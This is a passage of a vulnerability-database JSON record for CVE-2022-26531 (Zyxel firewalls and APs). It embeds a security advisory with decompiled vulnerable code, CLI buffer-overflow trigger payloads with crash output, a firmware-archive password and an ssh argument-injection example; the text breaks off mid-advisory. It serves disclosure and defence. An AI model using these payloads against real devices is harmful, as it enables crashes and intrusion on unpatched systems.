                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6103d-i:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6303d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abgl.6\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6303d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-e_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aasd.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-e:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6502d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aase.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6502d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6503d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aasf.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6503d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6553d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(aasg.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6553d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wac6552d-s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.25\\(abio.7\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wac6552d-s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax510d_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abtf.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax510d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax610d_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abte.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax610d:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax630s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abzd.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax630s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:wax650s_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "6.30\\(abrm.2\\)",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:wax650s:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marco Ivaldi",
        "sources": [
          {
            "db": "PACKETSTORM",
            "id": "167464"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2022-26531",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "PARTIAL",
                "baseScore": 4.6,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.9,
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "LOW",
                "accessVector": "LOCAL",
                "authentication": "NONE",
                "author": "VULMON",
                "availabilityImpact": "PARTIAL",
                "baseScore": 4.6,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-26531",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "MEDIUM",
                "trust": 0.1,
                "userInteractionRequired": null,
                "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "author": "security@zyxel.com.tw",
                "availabilityImpact": "HIGH",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 1.8,
                "impactScore": 4.2,
                "integrityImpact": "LOW",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-26531",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-26531",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202205-4000",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULMON",
                "id": "CVE-2022-26531",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-26531"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202205-4000"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-26531"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple improper input validation flaws were identified in some CLI commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware versions 4.32 through 5.21, VPN series firmware versions 4.30 through 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and earlier versions, that could allow a local authenticated attacker to cause a buffer overflow or a system crash via a crafted payload. --[ HNS-2022-02 - HN Security Advisory - https://security.humanativaspa.it/\n\n* Title: Multiple vulnerabilities in Zyxel zysh\n* Products: Zyxel firewalls, AP controllers, and APs\n* Author: Marco Ivaldi \u003cmarco.ivaldi@hnsecurity.it\u003e\n* Date: 2022-06-07\n* CVE Names and Vendor CVSS Scores:\n  CVE-2022-26531: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H (6.1)\n  CVE-2022-26532: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (7.8)\n* Advisory URLs:\n  https://github.com/hnsecurity/vulns/blob/main/HNS-2022-02-zyxel-zysh.txt\n  https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml\n\n\n--[ 0 - Table of contents\n\n1 - Summary\n2 - Background\n3 - Vulnerabilities\n4 - Analysis\n    4.1 - Buffer overflows in the \"configure terminal \u003e diagnostic\" command\n    4.2 - Buffer overflow in the \"debug\" command\n    4.3 - Buffer overflow in the \"ssh\" command\n    4.4 - Format string bugs in the \"extension\" argument of some commands\n    4.5 - OS command injection in the \"packet-trace\" command\n5 - Exploitation\n    5.1 - Buffer overflows\n    5.2 - Format string bugs\n    5.3 - OS command injection\n6 - Affected products\n7 - Remediation\n8 - Disclosure timeline\n9 - References\n\n\n--[ 1 - Summary\n\n\"We live on a placid island of ignorance in the midst of black seas of\ninfinity, and it was not meant that we should voyage far.\"\n                               -- H. P. Lovecraft, The Call of Cthulhu\n\nWe have identified multiple security vulnerabilities in the zysh binary\nthat implements the command-line interface (CLI) on a wide range of Zyxel\nproducts, including their security appliances such as those in the Unified\nSecurity Gateway (USG) product line:\n\n* Multiple stack-based buffer overflows in the code responsible for\n  handling diagnostic tests (\"configure terminal \u003e diagnostic\" command). \n* A stack-based buffer overflow in the \"debug\" command. \n* A stack-based buffer overflow in the \"ssh\" command. \n* Multiple format string bugs in the \"extension\" argument of the \"ping\",\n  \"ping6\", \"traceroute\", \"traceroute6\", \"nslookup\", and \"nslookup6\"\n  commands. \n* An OS command injection vulnerability in the \"packet-trace\" command. \n\nWe demonstrated the possibility to exploit the format string bugs and the\nOS command injection vulnerability to escape the restricted shell\nenvironment and achieve arbitrary command execution on the underlying\nembedded Linux OS, respectively as regular user and as root. \n\n\n--[ 2 - Background\n\nThe zysh binary is a restricted shell that implements the command-line\ninterface (CLI) on multiple Zyxel [0] products. All regular user accounts\nhave an /etc/passwd entry similar to the following:\n\nadmin:x:10007:10000:Administration account...:/etc/zyxel/ftp:/bin/zysh\n\nOnly the root user and the reserved debug account, disabled by default,\nhave access to a proper bash shell:\n\nroot:x:0:0:root\u0026admin\u0026120\u0026120\u0026480\u0026480\u00261\u00260:/root:/bin/bash\n... \ndebug:!:0:0:Debug Account:/root:/bin/bash\n\nThe Zyxel CLI can be accessed via SSH as follows:\n\nraptor@blumenkraft ~ % ssh \u003cREDACTED\u003e -l admin\n(admin@\u003cREDACTED\u003e) Password:\nRouter\u003e # hello zysh!\n\nOn our Zyxel USG20-VPN test device, the CLI can also be accessed via Telnet\n(not enabled by default) or via the so-called Web Console, implemented with\nWebSockets, that is reachable with a web browser after authentication, at a\nURL such as the following:\n\nhttps://\u003cREDACTED\u003e/webconsole/\n\nIn the context of a wider audit of the security posture of Zyxel devices\n[1], we decided to audit zysh with the primary goal of escaping the\nrestricted shell environment and executing arbitrary commands on the\nunderlying embedded Linux OS. It is pretty large for a dynamically-linked,\nstripped binary (~19MB) and it makes plenty of unsafe API function calls,\nwhich makes it an interesting target. \n\n\n--[ 3 - Vulnerabilities\n\nDuring our audit of the zysh binary, we identified the following\nvulnerabilities:\n\n* Multiple stack-based buffer overflows in the code responsible for\n  handling diagnostic tests (\"configure terminal \u003e diagnostic\" command). \n* A stack-based buffer overflow in the \"debug\" command. \n* A stack-based buffer overflow in the \"ssh\" command. \n* Multiple format string bugs in the \"extension\" argument of the \"ping\",\n  \"ping6\", \"traceroute\", \"traceroute6\", \"nslookup\", and \"nslookup6\"\n  commands. \n* An OS command injection vulnerability in the \"packet-trace\" command. \n\nAll buffer overflows can be triggered only by admin users, while the format\nstring bugs and the command injection vulnerability are exploitable by\nauthenticated users of either admin or limited-admin type. \n\n\n--[ 4 - Analysis\n\nTo follow along with our detailed vulnerability analysis, you can download\nthe Zyxel Firmware 5.10 for \"USG20-VPN - ABAQ - Non-Wireless Edition\"\n(USG20-VPN_5.10.zip [2]). Extract the ZIP archive, then extract the\npassword-protected ZIP archive 510ABAQ0C0.bin contained within, using the\nfollowing password [1]:\n\n4ulPPIs94jnYwUfwwoTqz/a5eRHFRwNYq8zFTrQZaE7XkoTgdzWc.6jea1v1zJb \n\nFinally, extract the Squashfs filesystem image with binwalk or a similar\ntool, e.g.:\n\nraptor@blumenkraft 510ABAQ0C0 % binwalk -e compress.img\n\nThe target binary we will reference throughout our analysys is /bin/zysh,\navailable in the extracted filesystem:\n\nraptor@blumenkraft bin % ls -l zysh\n-rwxr-xr-x  1 raptor  staff  19727292 Sep 23 18:33 zysh*\nraptor@blumenkraft bin % shasum -a 256 zysh\n47ee711a817e33bb2809e91d76b512498ae3cdca1276a2385f404384547404e3  zysh\nraptor@blumenkraft bin % file zysh\nzysh: ELF 32-bit MSB executable, MIPS, N32 MIPS64 rel2 version 1 (SYSV),\ndynamically linked, interpreter /lib32/ld.so.1, for GNU/Linux 2.6.9,\nstripped\n\nYou can easily import it in your favorite disassembler. In Ghidra, we had\nto manually tweak the import options to reflect that the binary was\ncompiled for the N32 ABI [3], importing it as \"MIPS:BE:64:64-32addr:n32\". \nThe same requirement holds for any other binaries compiled for the Cavium\nOcteon III processor, on which our Zyxel USG20-VPN test device is based. \n\n\n--[ 4.1 - Buffer overflows in the \"configure terminal \u003e diagnostic\" command\n\nThe first buffer overflow vulnerability we identified is located in the\nfunction at 0x1013b238, which we dubbed do_emtap():\n\nundefined8 do_emtap(longlong argc, char **argv)\n{\n... \n  char acStack305[129];\n... \n  else {\n    uVar1 = 1;\n    if (argc == 3) {\n      sprintf(acStack305 + 1, \"t%s.sh\", argv[2]); /* VULN #1 */\n      pcVar4 = argv[1];\n      do_emtap_test(pcVar4, acStack305 + 1);\n      do_emtap_test2(pcVar4, acStack305 + 1);\n      report_test();\n      uVar1 = 0;\n    }\n  }\n  return uVar1;\n}\n\nThis function is called when an admin user invokes the diagnostic test\nfunctionality in the Zyxel CLI with two arguments, e.g.:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test \u003ctest_name\u003e \u003ctest_num\u003e\n\nThe buffer overflow happens due to the unsafe sprintf() call marked with\nthe \"VULN #1\" comment above, which overflows past the boundary of the\nacStack305 array allocated on the stack with the contents of the \u003ctest_num\u003e\nargument. \n\nUpon exploitation, however, the return statement at 0x1013b2f4 is never\nreached, because the overflow propagates to the other functions that are\ncalled by do_emtap(), which we dubbed do_emtap_test() and do_emtap_test2()\nin the pseudo-code above. More precisely, another overflow happens at the\nsprintf() call below marked as \"VULN #2\", located in the do_emtap_test()\nfunction at 0x1013a8f8. This overflow enables us to gain control over the\npc register when do_emtap_test() returns:\n\nint do_emtap_test(char *test_name, char *test_num)\n{\n... \n  char acStack320[128];\n  char acStack192[128];\n... \n  sprintf(acStack320, \"%s/%s\", \"/tmp/tap\", test_name); /* VULN #3 */\n  mkdir(acStack320, 0x1c0);\n  sprintf(acStack192, \"%s/%s/%s\", \"/usr/local/emtap/test_script\",\n          test_name, test_num); /* VULN #2 */\n  iVar1 = access(acStack192, 0);\n  if (iVar1 != 0) {\n    return 1;\n  }\n... \n}\n\nThe unsafe sprintf() call overflows past the boundary of the acStack192\narray. When do_emtap_test() returns, we are able hijack the control flow. \nHowever, we can only use numeric characters in our hostile buffer,\ntherefore exploitation is extremely unlikely, if at all possible. The\noverflow can be triggered with the following payload:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test anything 1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\nProgram received signal SIGBUS, Bus error. \n0x31313130 in ?? ()\n\nA slightly better opportunity for exploitation is represented by another\nstack-based buffer overflow in the above function, marked with the \"VULN\n#3\" comment. This specific overflow can be triggered with the following\npayload:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 1\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nThis time, our hostile buffer can contain alphanumeric characters in the\nrange [a-zA-Z0-9], plus the underscore \u0027_\u0027. Still far from ideal, but\ndefinitely better than the previously identified exploitation vector.  \n\nA similar vector is provided by yet another stack-based buffer overflow,\nthis time in the function located at 0x1013ada0, which we dubbed\ndo_emtap_test3():\n\nundefined8 do_emtap_test3(char *test_name)\n{\n... \n  char acStack288[127];\n... \n  sprintf(acStack288, \"%s %s/%s | %s -E \\\u0027t[0-9]+\\\\.sh\\\u0027 \u003e %s\", \"/bin/ls\",\n\t  \"/usr/local/emtap/test_script\", test_name, \"/bin/grep\",\n          \"/tmp/tap/test_case_dir.tmp\"); /* VULN #4 */\n  system(acStack288);\n... \n    sprintf(acStack288, \"%s %s\", \"/bin/rm\", \"/tmp/tap/test_case_dir.tmp\");\n    system(acStack288);\n    return 0;\n  }\n... \n}\n\nThis function is called when an admin user invokes the diagnostic test\nfunctionality in the Zyxel CLI with only one argument, e.g.:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test \u003ctest_name\u003e\n\nThis time, the unsafe sprintf() call marked with the \"VULN #4\" comment\noverflows past the boundary of the acStack288 array. By exploiting this\noverflow, we can once again overwrite the pc register and hijack the\ncontrol flow. In order to trigger this overflow, the following payload can\nbe used:\n\nRouter\u003e configure terminal\nRouter(config)# diagnostic test AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n/bin/ls: cannot access /usr/local/emtap/test_script/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nIn the mentioned functions, including the one located at 0x1013aa10 that we\ndubbed do_emtap_test2() and that is not immediately reachable via the\ncodepaths triggered by our hostile inputs, there are other instances of\nbuffer overflow caused by the unchecked use of unsafe API functions, such\nas sprintf() and strcpy(). We have not deeply investigated their actual\nreachability, but they should be fixed as well. In addition, many unsafe\nprogramming constructs are present in the rest of the binary. \n\n\n--[ 4.2 - Buffer overflow in the \"debug\" command\n\nThe buffer overflow vulnerability we identified in the code responsible for\nhandling the \"debug\" command is located in the function at 0x1000df70,\nwhich we dubbed do_debug(). \n\nIt is a pretty long function that gets called when an admin (or in some\ncases a limited-admin) user invokes the debug functionality in the Zyxel\nCLI, e.g.:\n\nRouter\u003e debug \u003cargument list\u003e\n\nTo trigger the overflow, the following payload can be used:\n\nRouter\u003e debug gui webhelp redirect AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nRouter\u003e debug gui show webhelp redirect\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nThe first command writes a long string in the /tmp/webhelppath file:\n\nint do_debug(ulonglong argc, char **argv)\n{\n... \n  case 0x155:\n    if (DAT_1145e55c != 0x150) {\n      return 0;\n    }\n    pcVar11 = \"/tmp/webhelppath\";\n    if (DAT_1145e564 != 0x154) {\n      return 0;\n    }\nLAB_1000ebdc:\n    pFVar12 = fopen64(pcVar11, \"w\"); /* open file */\n... \n    fputs(argv[4], pFVar12); /* write string to file */\n    fclose(pFVar12);\n    return 0;\n}\n\nThe second command triggers the overflow by reading from the\n/tmp/webhelppath file:\n\nint do_debug(ulonglong argc, char **argv)\n{\n... \n  undefined8 local_e0;\n... \n    if (lVar24 == 0x155) {\n      pFVar12 = fopen64(\"/tmp/webhelppath\", \"r\");\n... \n\t__isoc99_fscanf(pFVar12, \"%s\", \u0026local_e0); /* VULN #5 */\n        fclose(pFVar12);\n        fwrite(\u0026DAT_1013fe18, 1, 9, stdout);\n        puVar22 = \u0026local_e0;\n        pcVar11 = \"Webhelp redirect: %s\\n\";\n      }\nLAB_1000f7d0:\n      fprintf(stdout, pcVar11, puVar22);\n      fwrite(\u0026DAT_1013fe48, 1, 2, stdout);\n      return 0;\n    }\n\nThe vulnerability lies in the use of the unsafe __isoc99_fscanf() API\nfunction, which does not check if the destination string is large enough to\naccommodate the whole source string. This allows us to overwrite the saved\nreturn address and hijack the control flow. Our hostile buffer is limited\nto a length of 255 bytes and can contain only alphanumeric characters in\nthe range [a-zA-Z0-9], plus the underscore \u0027_\u0027, dash \u0027-\u0027, and dot \u0027.\u0027\nspecial characters. \n\nA similar bug can be triggered with the \"debug gui kb redirect\" and \"debug\ngui show kb redirect\" command combination. However, in this case, the\ndestination buffer is too far away from the location where the return\naddress is saved on the stack, therefore we cannot exploit this bug to\ncontrol the pc register. We do not exclude other ways to exploit this\nvulnerability. \n\n\n--[ 4.3 - Buffer overflow in the \"ssh\" command\n\nThe buffer overflow vulnerability we identified in the code responsible for\nhandling the \"ssh\" command is located in the function at 0x10012298, which\nwe dubbed do_ssh():\n\nundefined8 do_ssh(int argc, char **argv)\n{\n... \n  char acStack336[300];\n... \n  sprintf(acStack336, \"/usr/bin/ssh -o UserKnownHostsFile=/dev/null %s\",\n    argv[1]); /* VULN #5 */\n... \n    sVar4 = strlen(acStack336);\n    sprintf(acStack336 + sVar4, \" -p %s\", *(undefined4 *)((int)argv +\n        iVar2)); /* VULN #6 */\n... \n}\n\nYou know the gist by now: there are two stack-based buffer overflows caused\nby the unchecked use of the unsafe API function sprintf(). To trigger the\nfirst overflow the following payload can be used, as an authenticated admin\nor limited-admin user:\n\nRouter\u003e ssh AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1\nThe authenticity of host \u0027127.0.0.1 (127.0.0.1)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:fzNloEaOsmNQLHbhjroUVHkJC9ZTH09A6TRjyK+oiys. \nAre you sure you want to continue connecting (yes/no/[fingerprint])? yes\nWarning: Permanently added \u0027127.0.0.1\u0027 (RSA) to the list of known hosts. \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@127.0.0.1\u0027s password:\n[press enter a few times]\nProgram received signal SIGBUS, Bus error. \n0x41414140 in ?? ()\n\nOnce again, our hostile buffer can contain only alphanumeric characters,\nplus some special characters. As a side note, we noticed that we can inject\narguments that get passed to the underlying /usr/bin/ssh command, albeit\nwith some limitations:\n\nRouter\u003e ssh -@127.0.0.1\nunknown option -- @\nusage: ssh [-46AaCfGgKkMNnqsTtVvXxYy] [-B bind_interface]\n           [-b bind_address] [-c cipher_spec] [-D [bind_address:]port]\n           [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11]\n           [-i identity_file] [-J [user@]host[:port]] [-L address]\n           [-l login_name] [-m 